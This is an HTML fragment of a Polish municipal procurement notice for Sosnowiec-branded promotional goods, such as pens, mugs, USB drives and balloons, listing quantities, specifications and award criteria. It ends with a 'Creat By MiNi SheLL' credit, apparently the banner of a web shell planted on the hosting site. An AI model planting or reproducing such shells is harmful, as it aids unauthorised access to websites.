<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Elegancki długopis- 200 sztuk
1. Długopis o jakości nie gorszej niż firmy Parker koloru granatowego lub zbliżonego do granatowego.
2. Długopis zapakowany w czarne lub zbliżone do czarnego etui z tworzywa sztucznego
3. Wymiary długopisu ok.: 135x12mm
4.Zdobienie długopisu: Grawer laserowy monochromatyczny logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku dostosowane do wielkości długopisu
5. Długopis wykonany z wytrzymałej, lakierowanej, stali nierdzewnej.
6. Wykończenia chromowane.
7. Obrotowy mechanizm wysuwania wkładu, wyposażony w standardowy wkład.
8. Gwarancja: międzynarodowa - 2 lata od dnia zakupu.
9. Wkład długopisu w kolorze niebieskim.

2. Komplet piśmienniczy - 300 sztuk
1.Komplet piśmienniczy długopis plus ołówek.
2. Przyciskany długopis z niebieskim wkładem i mechaniczny ołówek.
3. Wymiary 15x4.3x2,2 cm Nadruki 50x6 mm.
4. Anodowany aluminiowy korpus.
5. Matowe satynowe wykończenie.
6. Pojemnik z PU z magnetycznym zamknięciem.
7. Wymiary 15x4.3x2,2 cm.
8. Nadruk logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku ok. 50x6 mm.

3. Długopis ze wskaźnikiem laserowym i latarką. - 100 sztuk
1. Długopis czterofunkcyjny.
2. Metalowy długopis z klasycznym wskaźnikiem. teleskopowym, wskaźnikiem laserowym i latarką.
3. Wymiary produktu: 152x10x10mm.
4.  Trzy baterie 3xAG3 w cenie produktu.
5. Zestaw pakowany w srebrne opakowanie metalowe.
6.Wymiary etui. 178x37x17mm.
7. Zdobienie: Grawer laserowy monochromatyczny zawierający Logo miasta wraz z napisem Sosnowiec łączy zgodnie z SIW i Księgą Znaku, umiejscowienie zgodnie ze wzorem dostarczonym przez zamawiającego dostosowane do wielkości długopisu.

4. Długopis metalowy - 1.000 sztuk
1. Długopis metalowy koloru granatowego z mechanizmem wysuwania i chowania wkładu za pomocą przycisku na nasadce.
2. Wymiary: ok.140x9mm, tolerancja ok. +/- 3mm.
3. Zdobienie: Grawer laserowy monochromatyczny zawierający Logo miasta wraz z napisem Sosnowiec łączy zgodnie z SIW i Księgą Znaku, umiejscowienie zgodnie ze wzorem dostarczonym przez zamawiającego dostosowane do wielkości długopisu.
4. Wkład długopisu w kolorze niebieskim.

5. Długopis plastikowy - 2.500 sztuk
1. Długopis plastikowy koloru granatowego zbliżonego do Pantone dla powlekanych 295C, nie transparentny, automatyczny z antystresowym wahadłowym mechanizmem.
2. Wymienny wkład koloru niebieskiego.
3. Zdobienie: Logo  Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy na korpusie, w jednym kolorze zgodnie z SIW i Księgą Znaku oraz adres strony: internetowej www.sosnowiec.pl na klipsie w jednym kolorze z SIW i Księgą Znaku.
4. Wymiary długopisu: ok. 140x20 mm.
5. Wymiary logo (maksymalne): Długopis - 20x13 mm.
6. Wymiary adresu strony (maksymalne): Klips - 33x4 mm.


6. Długopis plastikowy - 2.500 sztuk
1. Długopis plastikowy koloru zielonego zbliżonego do Pantone dla powlekanych 376C, nie transparentny, automatyczny z antystresowym wahadłowym mechanizmem.
2. Wymienny wkład koloru niebieskiego.
3. Zdobienie: Logo  Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy na korpusie, w jednym kolorze zgodnie z SIW i Księgą Znaku oraz adres strony: internetowej www.sosnowiec.pl na klipsie w jednym kolorze z SIW i Księgą Znaku.
4. Wymiary długopisu: ok. 140x20 mm.
5. Wymiary logo (maksymalne): Długopis - 20x13 mm.
6. Wymiary adresu strony (maksymalne): Klips - 33x4 mm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Spinki do mankietów - 100 sztuk
1. Komplet spinek składający się z dwóch spinek do
mankietów ze znalu z powłoką galwaniczną w kolorze rodowanego srebra.
2. Wymiary: szerokość: 20 mm (tolerancja +/- 0,5 mm).
długość: 13 mm (tolerancja +/- 0,5 mm).
grubość: 1,5 mm (tolerancja +/- 0,1 mm).
3. Opakowanie: Opakowanie: czarne plastikowe pudełko w środku wykończone białym atłasem.
4. Wymiary pudełka: dł.75 mm x szer. 55 mm x wys.28 mm(tolerancja +/- 2mm do każdego wymiaru).
5. Spinki umieszczone na gąbce lub tekturze powlekanej flokati.
Grubość gąbki lub tektury około: 5 mm (tolerancja +/- 2mm).
6. Zdobienie: Nadruk na opakowaniu : metodą trwałą, na opakowaniu naniesione logo zgodnie z SIWZ i księgą znaku w kolorze srebrnym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kubek izotermiczny - 200 sztuk
1. Kubek izotermiczny z plastikową pokrywką. -kolor: stalowy.
2. Dwie ścianki ze stali nierdzewnej.
3. Wewnątrz kubka stal o podwyższonej jakości.
4. Pojemność 380 ml.
5. Wymiary produktu ok. 85x163x65mm
6. plastikowy uchwyt do trzymania.
7.Technika zdobienia Grawer laserowy monochromatyczny z Logo miasta wraz z napisem Sosnowiec łączy zgodnie z SIW i Księgą Znaku.
8. Kubek pakowany w kartonowe pudełko.

2. Frisbee - 500 sztuk
1. Frisbee w kształcie koła z zaokrąglonymi brzegami wykonane z plastiku koloru zielonego zbliżonego do Pantone dla powlekanych 376C
2. Rozmiary: 2,2 O23 cm
3.Zdobienie: logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku.

3. Zestaw kredek(tuba) - 500 sztuk
1. Zestaw dwunastu drewnianych kolorowych kredek w kartonowej tubie.
2. Wymiary: ok. 98x35x35mm.
3. W tubie powinno się znajdować12 drewnianych różnokolorowych, kredek.
4. Kredki zapakowane w tubę, górna część tuby w kształcie kredki jak na załączonej wizualizacji.
5. Zdobienie Logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku

4. Brelok z żetonem - 5.000 sztuk
1. Brelok koloru jasno-zielonego transparentny  wraz z żetonem koloru białego.
2. Wymiary: przybliżone: w najszerszym miejscu ok. 35mm, wysokość ok. 58mm.
3. Zdobienie: Żeton: Logo Sosnowca z hasłem Sosnowiec łączy w dwóch kolorach po obu stronach. Brelok: Adres strony internetowej www.sosnowiec.pl w kolorze białym po obu stronach. Zgodnie z SIW oraz Księgą Znaku.
4. Kółko w kolorze srebrnym.

5. Notes magnetyczny na lodówkę - 500 sztuk
1.Notes magnetyczny na lodówkę, kształt prostokątny.
2.Główka prostokątna wymiary: ok. 60x40mm.
a) folia magnetyczna 0,4 mm.
b) druk kolor 4+0 według dostarczonego wzoru przez Zamawiającego. 
c) folia błyszcząca.
3. Bloczek wymiary: 60x70mm.
a) papier biały offset 80g.
b) druk kolor 4+0.
c) 20 karteczek w bloczku.
4. pakowanie w pojedyncze torebki celofanowe.

6. Opaska odblaskowa - 2.500 sztuk
1.Samozaciskowa opaska odblaskowa na rękę lub ramię koloru granatowego Pantone dla powlekanych 295C lub zbliżonym zgodnie z SIW i Księgą Znaku,
2.Budowa/Surowiec: blaszka samozaciskowa zalaminowana odblaskową folia pryzmatyczną, spód materiał typu flock łagodny dla dłoni (wewnątrz wyposażone dodatkowe warstwy folii pcv chroniące pryzmat przed zniszczeniem / przetarciem)
3. Wymiary: 340x30mm
4. Zdobienie: Logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy oraz adresem strony internetowej www.sosnowiec.pl w kolorze białym zgodnie z SIW i Księgą Znaku.
5. Opaska wykończona welurem  od strony przylegającej do ręki,

7. Opaska odblaskowa - 2.500 sztuk
1.Samozaciskowa opaska odblaskowa na rękę lub ramię koloru zielonego Pantone dla powlekanych 376C, zgodnie z SIW i Księgą Znaku
2.Budowa/Surowiec: blaszka samozaciskowa zalaminowana odblaskową folia pryzmatyczną, spód materiał typu flock łagodny dla dłoni (wewnątrz wyposażone dodatkowe warstwy folii pcv chroniące pryzmat przed zniszczeniem / przetarciem)
3. Wymiary: 340x30mm
4. Zdobienie: Logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy oraz adresem strony internetowej www.sosnowiec.pl w kolorze granatowym zgodnie z SIW i Księgą Znaku.
5. Opaska wykończona welurem od strony przylegającej do ręki.

8. Zapach do samochodu - 1.000 sztuk
1. Zapach do samochodu o indywidualnym kształcie (logo)
wykonany z kartonu.
2. Wielkość około: 80x60mm
3. Grubość około 2mm
4. kolor: 4+4
5. Pakowanie indywidualny woreczek foliowy.

9. Pamięć USB - 200 sztuk
1.Pamięć USB o pojemności  4 GB.
2.Wymiary: ok. 58x17x8mm.
3.Surowiec: plastik koloru zielonego zbliżony do Pantone dla powlekanych 376C, zgodnie z SIW i Księgą Znaku.
4.Zdobienie: naklejka epoksydowa z wydrukowanym logo zgodnie z SIW i Księgą Znaku
5. Wielkość naklejki: ok. 31x12 mm.
6. interfejs USB 2.0, zgodny wstecz z USB 1.1,
7. kompatybilny z systemami Windows, Mac i Linux .
8. nie wymaga sterowników w systemach MS Windows Me/2000/XP/Vista/Siedem.
9. wymagana co najmniej 12-sto miesięczna gwarancja producenta.
10. opakowanie kartonowe

10. Proporczyk - 200 sztuk
1. Proporczyk atłasowy.
2. Surowiec:: Atłas.
3. Wymiary: ok. 150x250mm; długość frędzli: ok. 30mm.
4. Nadruk według załączonej wizualizacji metodą sublimacji.
5. Każdy proporczyk zapakowany w worek foliowy zgrzewany..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Krawat z mikrofibry - 100 sztuk
1. Krawat z mikrofibry wraz z opakowaniem.
2. Surowiec: Mikrofibra
3. Wymiary: Długość ok. 1450mm, szerokość ok. 80mm.
4. Krawat w opakowaniu kartonowym opakowanie w kolorze granatowym zgodnie z Księgą Znaku oraz SIW lub zbliżonym do KZ. Na opakowaniu naniesiony herb Sosnowca oraz napis Sosnowiec w kolorze srebrnym.
5. Kolor krawatu zbliżony do Pantone dla powlekanych 295C

2.Krawat z jedwabiu - 100 sztuk
1. Krawat jedwabny wraz z opakowaniem.
2. Surowiec: Jedwab.
3. Wymiary: Długość ok. 1450mm, szerokość ok. 80mm.
4. Krawat w opakowaniu kartonowym opakowanie w kolorze granatowym zgodnie z Księgą Znaku oraz SIW lub zbliżonym do KZ. Na opakowaniu naniesiony herb Sosnowca oraz napis Sosnowiec w kolorze srebrnym.
5. Kolor krawatu zbliżony do Pantone dla powlekanych 295C..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Portfel skórzany - 100 sztuk
1. Portfel skórzany czarny.
2. wymiary ok.: 105 x 90 mm.
3. Przegródka na banknoty.
4. Wyposażony w bilonówkę.
5. Wyposażony w miejsce na karty kredytowe z miejscem na dowód osobisty i prawo jazdy.
6. Logo miasta wraz z napisem Sosnowiec łączy zgodnie z SIW i Księgą Znaku, naniesione na portfel metoda tłoczenia w jednym miejscu ok. 40x40mm.
7. Portfel pakowany w kartonowe opakowanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Balony - 3 sztuki
Balon B-16 4m wysokości
1. Materiał :poliester powlekany trudnopalny, wodoodporny o gramaturze nie mniejszej niż 399gr/m2 (certyfikaty)
2. Nadruk:
a) grafika wykonana metodą solwentu zgodnie z kolorystyka zamawiającego, Druki dodatkowo laminowane zabezpieczone przed zniszczeniem i odporny na UV.
3. Wentylator :
a) stopień ochronyIP44 i klasie izolacji B
b) prędkość obrotowa2100obr/min.
c) pobór mocy 260W / 230V, 1,18A
d) wydajność 600m3/h
e) ciśnienie statyczne580Pa
f) poziom ciśnienia akustycznego71dB
4. Oświetlenie wewnętrzne 
a) osłona wykonana z poliwęglanu transparentnego(temperatura pracy-50oCdo+120oC,wysoka udarność i twardość , trudnopalność )
b) żarówka energooszczędna 23W
c) strumień świetlny 1400Lm
d) Przewód OMY 2x1,5
e) max temp.60oC
5. Zestaw odciągów:
a) linki wykonane z jedwabiu polipropylenowego charakteryzują się niewielkim ciężarem właściwym który wynosi0,91cm
b) linki te nie toną w wodzie oraz jedynie powierzchniowo ją chłoną ( mała higroskopijność włókien) 
c) nie zmieniają wymiarów i twardości pod wpływem warunków atmosferycznych , są trwałe do temp.100oC, a temp. topnienia wynosi 165oC 
d) charakteryzują się odpornością na ścieranie oraz bardzo dobrą odpornością na działanie
kwasów , soli i zasad.
e) są odporne na działanie promieni UV
6. Śledzie:
a) cynkowane śledzie o długości 35cm.
7. Pokrowiec transportowy:
a)wykonany z trwałych materiałów , dno usztywnione , rączki do przenoszenia z dodatkowym usztywnieniem, wyposażony w okienko do włożenia listów identyfikacyjnych.
8.Instrukcja obsługi w jęz. polskim
9. Gwarancja 12 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com